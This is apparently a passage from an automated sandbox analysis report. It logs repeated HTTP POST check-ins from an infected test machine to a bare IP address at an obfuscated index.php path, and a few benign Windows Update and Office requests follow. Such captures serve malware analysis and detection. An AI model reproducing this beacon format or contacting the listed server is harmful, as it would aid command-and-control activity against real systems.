                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:45.790236950 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:45 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            137192.168.2.450355185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:47.528485060 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:48.951262951 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:48 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            138192.168.2.450356185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:50.583854914 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:51.923101902 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:51 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            139192.168.2.450357185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:53.663229942 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:55.041209936 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:54 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            140192.168.2.450358185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:56.675131083 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:58.071485043 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:57 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            141192.168.2.450359185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:59.808342934 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:01.219836950 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:17:00 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            142192.168.2.450360185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:02.856239080 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            143192.168.2.450361185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:04.887742996 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:06.264218092 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:17:06 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            144192.168.2.450363185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:07.905745983 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:09.300832987 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:17:09 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            145192.168.2.450364185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:11.036833048 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:12.423847914 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:17:12 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            146192.168.2.450365185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:14.065196991 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:15.401407003 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:17:15 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            147192.168.2.450366185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:17.151226997 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:18.575784922 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:17:18 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            148192.168.2.450367185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:20.216629028 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            149192.168.2.450368185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:22.180721045 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:23.568427086 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:17:23 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            0192.168.2.4497304.175.87.197443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:20 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gGycNp42KykxeBF&MD=kGXnbV+K HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:20 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                            MS-CorrelationId: 1e7b0f73-9c3c-40d7-9a18-a9da00e16ec0
                                                                                                                                                                                                                                                                                                            MS-RequestId: 3d58d338-9173-464c-9617-d92b1009bc69
                                                                                                                                                                                                                                                                                                            MS-CV: HPkkW84MOU6BfTdV.0
                                                                                                                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:09:20 GMT
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:20 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:20 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            1192.168.2.44973613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:56 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
